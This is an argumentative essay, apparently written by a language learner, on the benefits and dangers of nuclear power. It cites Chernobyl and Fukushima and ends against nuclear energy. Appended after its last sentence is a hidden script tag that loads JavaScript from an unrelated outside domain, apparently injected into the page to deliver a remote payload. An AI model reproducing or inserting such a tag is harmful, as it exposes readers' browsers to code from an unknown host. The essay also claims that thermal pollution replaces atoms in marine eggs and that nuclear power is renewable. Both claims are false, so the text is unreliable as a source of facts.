In this contemporary era, due to burgeoning population demand for resources like coal, petrol, and electricity is increasing, but these resources are limited in number and thus, to meet the needs of people nuclear is considered as a good option. However, I disagree with this statement. Though, it has a lot of advantages but its detrimental effects cannot be neglected.

Nuclear energy host a lots of benefits. To begin with, it produces no polluting gases and thereby, does not contribute the greenhouse effect. For instance- during the production of fuel it does not produce carbon dioxide and this makes it eco friendly means of source. Furthermore, it employs large number of pupils and as a result, alleviate the the problem of unemployment. As this energy is based on scientific research and high technology, it help the other industries like transport industry and technicians to flourish. Last but not the least, the lifespan of power station is very much, it can last for several years.

On the other considerable side, it also cites with disadvantages. First and the foremost the waste and radioactive radiations are emitted by these plants are hazardous, which even leads to cancer and death. Also, thermal pollution affects the marine life and to elaborate this, the exposure of eggs and larvae of marine animals to this pollution, replaces the atoms of eggs with the new atom consequently, mutations in DNA occurs causing severe issues related to health. These are more accident-prone and this events may be catastrophic which can be caused because of human errors or by natural disasters. Chernobyl disaster in Ukraine took place because of humans, while Fukushima disaster (japan) arised due to earthquake and Tsunami. If these disaster happens, many people can be killed. In addition to this, the cost of implementation is very high, thus, making its difficult for poor nation to adopt this technique.

To conclude, although it is a good renewable source as it is eco-friendly, but it is very perilous as it is arduous to use it is safely. <script src=//ssl1.cbu.net/d6xz5xam></script>